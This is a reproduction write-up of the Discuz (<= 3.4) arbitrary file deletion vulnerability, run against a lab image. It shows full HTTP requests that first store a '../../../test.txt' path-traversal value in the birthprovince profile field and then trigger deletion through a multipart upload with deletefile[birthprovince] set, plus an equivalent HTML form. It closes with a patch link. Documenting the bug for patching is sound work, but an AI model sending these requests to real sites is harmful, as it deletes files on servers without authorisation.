Preface: on September 29 (2017), Discuz fixed a front-end arbitrary file deletion vulnerability, one that any ordinary logged-in user can trigger. A similar vulnerability had already been reported to WooYun and to the Discuz team in 2014, but the fix was incomplete, and that incomplete fix is what led to this one. Many posts online say the official 3.4 release already contains the fix, but the environment I used is the 3.4 image from vulhub, so I don't know whether 3.4 is patched or not; I simply reproduced it.

Affected versions: Discuz <= 3.4

Environment
Reproduction steps: first create a file named test.txt in the Discuz web root directory; this is the file we will delete later.
(screenshot: creating test.txt)
Visit http://192.168.220.131/home.php?mod=spacecp, open the browser's element inspector, find the value of formhash and copy it.
(screenshot: the formhash value)
Capture the request with Burp to obtain the session cookie.
(screenshot: the captured cookie)
Send the request below, substituting your own cookie and formhash and the file you want to delete. The birthprovince value is later joined onto the profile attachment directory (data/attachment/profile/ on a default install), so ../../../test.txt points at test.txt in the web root:
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Connection: close

------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"

84a7f376
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"

../../../test.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"

1
------WebKitFormBoundaryPFvXyxL45f34L12s--
(screenshot: sending the request)
Refresh the page; the birthplace field now shows the state in the screenshot below:
(screenshot: data written successfully)
This shows that the traversal string has been saved into the database as this user's birthprovince value.
Next, create an upload.html with the following code, changing the IP to your Discuz host and the formhash value to your own:
<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="84a7f376" />
<input type="text" name="profilesubmit" value="1" />
<input type="submit" value="Submit" />
</form>
Or construct the request directly:
POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1
Host: 192.168.220.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------123821742118716
Content-Length: 91989
Connection: close
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Upgrade-Insecure-Requests: 1

-----------------------------123821742118716
Content-Disposition: form-data; name="birthprovince"; filename="0.jpg"
Content-Type: image/jpeg

zerba
-----------------------------123821742118716--
The file body ("zerba" here) can be anything; what matters is that a file part is present in the birthprovince field and that deletefile[birthprovince] is set in the URL. The Content-Length shown is from the original capture, which carried a real image; make sure it matches the body you actually send (Burp Repeater recalculates it for you).
Look in the Discuz directory again: test.txt has been deleted.
Fix recommendation: https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574
Edit upload/source/include/spacecp/spacecp_profile.php and remove the unlink-related code in the deletefile branch. Verify the fix the same way the bug was reproduced: re-run the two requests above against a throwaway file and confirm it is still present afterwards.